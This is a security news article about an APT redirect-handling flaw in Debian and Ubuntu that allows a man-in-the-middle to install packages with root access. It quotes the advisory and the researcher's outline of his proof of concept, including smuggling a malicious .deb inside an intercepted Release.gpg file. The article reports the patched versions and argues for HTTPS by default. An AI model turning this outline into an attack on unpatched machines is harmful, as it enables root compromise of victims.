A couple of popular Linux distributions have a vulnerability in the main package-management interface that an attacker could use to trick a user into installing a malicious package that would then give the attacker root access on the target machine.
The vulnerability is in the APT package manager, which handles the way that software packages are downloaded and installed on Linux systems, including Debian and Ubuntu. Researcher Max Justicz discovered a flaw in APT that involves the way that the utility handles redirects during the installation process that an attacker on the network could exploit to get root privileges on a victim’s machine.
Several versions of Debian and Ubuntu are vulnerable to the bug, and the maintainers of both distributions have released updated versions that fix the issue. Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 14.04 LTS all are vulnerable. Debian 1.4.9 is the patched version for that distribution.
“The code handling HTTP redirects in the HTTP transport method doesn't properly sanitize fields transmitted over the wire. This vulnerability could be used by an attacker located as a man-in-the-middle between APT and a mirror to inject malicious content in the HTTP connection,” the Debian advisory says.
“This content could then be recognized as a valid package by APT and used later for code execution with root privileges on the target machine.”
In the advisory, Justicz laid out a technique that an attacker with a man-in-the-middle position could use in order to install a malicious package on a vulnerable Debian system. The method relies on the fact that a specific file is installed in a known location.
“In my proof of concept, because I chose to inject the 201 URI Done response right away, I had to deal with the fact that no package had actually been downloaded yet. I needed a way to get my malicious .deb onto the system for use in the Filename parameter,” Justicz wrote.
“To do this, I took advantage of the fact that the Release.gpg file pulled during apt update is both malleable and installed into a predictable location. Specifically, Release.gpg contains ASCII-armored PGP signatures...But apt’s signature validation process is totally fine with the presence of other garbage in that file, as long as it doesn’t touch the signatures. So I intercepted the Release.gpg response and prepended it with my malicious deb.”
One of the foundational problems that enables the exploitation of this vulnerability is the update servers delivering packages over HTTP, rather than HTTPS, be default. Although the legitimate packages themselves are signed, an attacker with a privileged network position could use Justicz’s vulnerability and others like it to get a malicious package onto a victim’s computer. Justicz recommended that maintainers use HTTPS as the default transport mechanism for updates to help protect against these attacks.
“Yes, a malicious mirror could still exploit a bug like this, even with https. But I suspect that a network adversary serving an exploit is far more likely than deb.debian.org serving one or their TLS certificate getting compromised,” Justicz wrote.
“Supporting http is fine. I just think it’s worth making https repositories the default – the safer default – and allowing users to downgrade their security at a later time if they choose to do so.”